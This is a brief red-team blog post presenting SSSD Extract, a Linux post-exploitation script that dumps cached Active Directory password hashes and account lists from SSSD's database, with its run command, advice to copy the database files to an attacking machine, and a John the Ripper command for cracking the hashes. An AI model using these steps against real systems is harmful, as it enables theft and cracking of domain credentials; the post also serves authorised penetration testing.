Tool: SSSD Extract

Aug 20, 2023
Red Team Linux Post Exploitation Share on:

Tool Link: https://github.com/z-r0crypt/SSSD-extract

Using this tool it is possible to extract Active Directory accounts hashes when credential caching is enabled in SSSD. Also it fetches any user and group accounts cached in the SSSD database which could be usefull in post-exploitation activities.

zsh sssd-extract.sh [$FolderPath]

Without input arguments it takes the SSSD default path “/var/lib/sss/db/” but you can use a different one. If tdbdump is not installed it just lists the ldb files which contain the hashes, you can install it apt install tdb-tools or exfiltrate these files:

In a system with tdbdump installed the script will:

Extracts cached accounts and hashes, dumping the results to the file hashes.txt. The hashes can then be cracked using Hashcat or John the Ripper:
```
john hashes.txt --format=sha512crypt
```
Extract all the AD groups, Users and Machine accounts cached in the ldb file and save it to domain.txt

*Better approach would be to copy the ldb file to you attacking machine and run the script there.

Credit

github.com/ricardojoserf/SSSD-creds

Z-r0crypt

Tool: SSSD Extract

Tool Link: https://github.com/z-r0crypt/SSSD-extract

Credit

Share this post on: